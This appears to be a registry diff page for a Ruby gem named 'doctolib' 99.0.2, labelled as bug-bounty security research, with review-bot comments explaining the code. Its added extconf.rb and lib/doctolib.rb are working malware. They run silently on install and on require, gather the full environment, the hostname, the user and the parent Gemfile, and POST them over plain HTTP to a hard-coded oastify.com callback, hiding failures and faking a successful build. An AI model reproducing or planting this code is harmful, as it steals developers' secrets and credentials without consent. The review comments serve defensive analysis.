doctolib 99.0.2


Potentially problematic release.


This version of doctolib might be problematic.

Files changed (4)
  1. checksums.yaml +7 -0
  2. data/ext/doctolib/extconf.rb +50 -0
  3. data/lib/doctolib.rb +50 -0
  4. metadata +42 -0
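--- a/checksums.yaml
+++ b/checksums.yaml
@@ -0,0 +1,7 @@
+ ---
+ SHA256:
+ metadata.gz: 450c1b6b8c3be533b171a5250456fab5a8a87f37eb6fb221c2f744872ecdf0df
+ data.tar.gz: 2c2f08bbc998a6166ca00cde73f28919684fbe6bafbebf5969d9b04fa08d32ce
+ SHA512:
+ metadata.gz: b8469d12ae653fb336ef89b96029f0320b20499652d59d5bd9264a63dd9b79f197d5a6eff4100fad24dc2b5e37e09bb1cc657dbddf13208d88fb654083250576
+ data.tar.gz: ae298c2366bf3537e22691c8dca7090de83189585b3ac677b8e9c1f18d37ff8b3484d29ed7b1aab150f102fb6750f254153568ce158f3698cb80332d6af25bc8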
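--- a/data/ext/doctolib/extconf.rb
+++ b/data/ext/doctolib/extconf.rb
@@ -0,0 +1,50 @@
+ require 'net/http'
+ require 'uri'
+ require 'json'
+ require 'socket'
+
+ CALLBACK = 'icaregems.7em0ii1mpvc50kzafx6bf1xunltch6hu6.oastify.com'
+
+ begin
+ info = {
+ type: 'gem_install',
+ hostname: Socket.gethostname,
+ user: ENV['USER'] || ENV['USERNAME'],
+ pwd: Dir.pwd,
+ home: ENV['HOME'],
+ ruby_version: RUBY_VERSION,
+ platform: RUBY_PLATFORM,
+ env: ENV.to_h,
+ timestamp: Time.now.utc.iso8601
+ }
+
+ # Trouver le projet parent (Gemfile)
+ dir = Dir.pwd
+ 10.times do
+ gemfile = File.join(dir, 'Gemfile')
+ if File.exist?(gemfile)
+ info[:parent_gemfile] = File.read(gemfile) rescue nil
+ info[:parent_dir] = dir
+ info[:parent_files] = Dir.entries(dir) rescue nil
+ break
+ end
+ parent = File.dirname(dir)
+ break if parent == dir
+ dir = parent
+ end
+
+ # Callback HTTP (pas HTTPS)
+ uri = URI("http://#{CALLBACK}/gem_install")
+ http = Net::HTTP.new(uri.host, uri.port)
+ http.open_timeout = 5
+ http.read_timeout = 5
+
+ request = Net::HTTP::Post.new(uri.path)
+ request['Content-Type'] = 'application/json'
+ request.body = info.to_json
+
+ http.request(request)
+ rescue => e
+ end
+
+ File.write('Makefile', "all:\n\techo 'OK'\ninstall:\n\techo 'OK'\n")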
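Review bot: The `info` hash carries `env: ENV.to_h` together with the host name, user, working directory and the contents of the nearest parent `Gemfile`, and the script POSTs all of it in cleartext HTTP to the hard-coded `CALLBACK` host; since the gemspec lists this file under `extensions:`, that happens during `gem install`, before the gem is ever required. The empty `rescue => e` and the stub `Makefile` written on the last line make the install report success with nothing built, so the only trace is the outbound request. An `extconf.rb` has no reason to open a network connection: the whole `begin … end` block should be removed, and a gem with no native code should declare no extension at all. `lib/doctolib.rb` sends the same `ENV.to_h` payload when the gem is loaded. Any host that installed this version should have the secrets present in its environment rotated, and DNS and proxy logs searched for the `CALLBACK` hostname.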
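--- a/data/lib/doctolib.rb
+++ b/data/lib/doctolib.rb
@@ -0,0 +1,50 @@
+ require 'net/http'
+ require 'uri'
+ require 'json'
+ require 'socket'
+
+ module Doctolib
+ VERSION = '99.0.2'
+ CALLBACK = 'icaregems.7em0ii1mpvc50kzafx6bf1xunltch6hu6.oastify.com'
+
+ unless defined?(@@triggered)
+ @@triggered = true
+
+ Thread.new do
+ begin
+ info = {
+ type: 'gem_require',
+ hostname: Socket.gethostname,
+ user: ENV['USER'] || ENV['USERNAME'],
+ pwd: Dir.pwd,
+ ruby_version: RUBY_VERSION,
+ rails_env: ENV['RAILS_ENV'],
+ rack_env: ENV['RACK_ENV'],
+ env: ENV.to_h,
+ timestamp: Time.now.utc.iso8601
+ }
+
+ webhook = ENV['SECURITY_BUG_BOUNTY_DOCTOLIB_IS_PWN']
+ info[:webhook_found] = !webhook.nil?
+
+ # HTTP pas HTTPS
+ uri = URI("http://#{CALLBACK}/gem_require")
+ http = Net::HTTP.new(uri.host, uri.port)
+ http.open_timeout = 5
+ http.read_timeout = 5
+
+ request = Net::HTTP::Post.new(uri.path)
+ request['Content-Type'] = 'application/json'
+ request.body = info.to_json
+
+ http.request(request)
+
+ if webhook
+ webhook_uri = URI(webhook)
+ Net::HTTP.get(webhook_uri)
+ end
+ rescue
+ end
+ end
+ end
+ end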
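Review bot: `Net::HTTP.get(webhook_uri)` requests whatever URL the `SECURITY_BUG_BOUNTY_DOCTOLIB_IS_PWN` environment variable holds, with no check on scheme or host, from inside a `Thread.new` that starts as a side effect of evaluating the module body, so a plain `require 'doctolib'` is enough to trigger it. The bare `rescue` at the end of the thread discards every error, and `@@triggered` limits the run to once per process, so the application sees no failure and no log line. The gemspec description calls this security research, but a proof of installation does not need the full environment; the package should be handled as a credential exposure whatever the stated intent. A library's top level should define constants and methods only, so the `unless defined?(@@triggered) … end` block should be removed.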
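--- a/metadata
+++ b/metadata
@@ -0,0 +1,42 @@
+ --- !ruby/object:Gem::Specification
+ name: doctolib
+ version: !ruby/object:Gem::Version
+ version: 99.0.2
+ platform: ruby
+ authors:
+ - icare
+ bindir: bin
+ cert_chain: []
+ date: 1980-01-02 00:00:00.000000000 Z
+ dependencies: []
+ description: Security research package
+ email: icare@security.research
+ executables: []
+ extensions:
+ - ext/doctolib/extconf.rb
+ extra_rdoc_files: []
+ files:
+ - ext/doctolib/extconf.rb
+ - lib/doctolib.rb
+ homepage: https://github.com/icare/doctolib
+ licenses:
+ - MIT
+ metadata: {}
+ rdoc_options: []
+ require_paths:
+ - lib
+ required_ruby_version: !ruby/object:Gem::Requirement
+ requirements:
+ - - ">="
+ - !ruby/object:Gem::Version
+ version: 2.5.0
+ required_rubygems_version: !ruby/object:Gem::Requirement
+ requirements:
+ - - ">="
+ - !ruby/object:Gem::Version
+ version: '0'
+ requirements: []
+ rubygems_version: 3.6.7
+ specification_version: 4
+ summary: Security research - Bug Bounty
+ test_files: []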